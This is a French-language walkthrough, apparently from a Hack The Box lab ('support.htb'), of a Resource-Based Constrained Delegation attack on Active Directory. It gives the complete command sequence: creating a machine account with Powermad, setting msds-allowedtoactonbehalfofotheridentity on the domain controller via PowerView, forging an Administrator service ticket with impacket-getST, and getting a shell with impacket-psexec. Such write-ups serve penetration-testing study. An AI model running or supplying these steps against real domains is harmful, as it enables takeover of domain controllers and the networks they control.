Resource Based Constrained Delegation - Active Directory Exploitation

La vulnérabilité Resource-Based Constrained Delegation (RBCD) permet à un attaquant de détourner la délégation de service dans un environnement Active Directory. En exploitant cette vulnérabilité, un attaquant peut configurer un service compromis pour qu'il délègue des privilèges d'accès à un autre service, permettant ainsi l'escalade de privilèges et l'accès à des ressources sensibles, souvent en contournant les contrôles de sécurité.

Déploiement du script Powermad pour la création d'un compte machine.

Powermad/Powermad.ps1 at master · Kevin-Robertson/PowermadGitHub

upload Powemad.ps1
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount SERVICEA -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

Utilisation de PowerView pour vérifier la création du compte machine.

PowerSploit/Recon/PowerView.ps1 at master · PowerShellMafia/PowerSploitGitHub

upload PowerView.ps1
Import-Module .\PowerView.ps1

Définition des autorisations pour le compte machine à l'aide de commandes PowerShell.

$ComputerSid = Get-DomainComputer SERVICEA -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Avec cette commande, on vérifie si toute la procédure 'Get-DomainComputer dc' fonctionne en utilisant les propriétés 'msds-allowedtoactonbehalfofotheridentity'.'

Exploitation de la vulnérabilité

Utilisation de l'outil Impacket pour exécuter la commande `getST` afin d'obtenir un ticket TGT impersonnant l'utilisateur Administrator.

impacket-getST -spn cifs/dc.support.htb -impersonate Administrator -dc-ip 10.10.11.174 support.htb/SERVICEA$:123456

Configuration de l'environnement pour l'utilisateur Administrateur en exportant la variable `KRB5CCNAME et connexion`au système cible à l'aide de l'outil `psexec` d'Impacket.

export KRB5CCNAME=Administrator.ccache
impacket-psexec -k dc.support.htb

Mis à jour il y a 11 mois

Ce contenu vous a-t-il été utile ?

Déploiement du script Powermad pour la création d'un compte machine.

Utilisation de PowerView pour vérifier la création du compte machine.

Définition des autorisations pour le compte machine à l'aide de commandes PowerShell.

Avec cette commande, on vérifie si toute la procédure 'Get-DomainComputer dc' fonctionne en utilisant les propriétés 'msds-allowedtoactonbehalfofotheridentity'.'

Exploitation de la vulnérabilité

Utilisation de l'outil Impacket pour exécuter la commande getST afin d'obtenir un ticket TGT impersonnant l'utilisateur Administrator.

Configuration de l'environnement pour l'utilisateur Administrateur en exportant la variable KRB5CCNAME et connexionau système cible à l'aide de l'outil psexec d'Impacket.

Utilisation de l'outil Impacket pour exécuter la commande `getST` afin d'obtenir un ticket TGT impersonnant l'utilisateur Administrator.

Configuration de l'environnement pour l'utilisateur Administrateur en exportant la variable `KRB5CCNAME et connexion`au système cible à l'aide de l'outil `psexec` d'Impacket.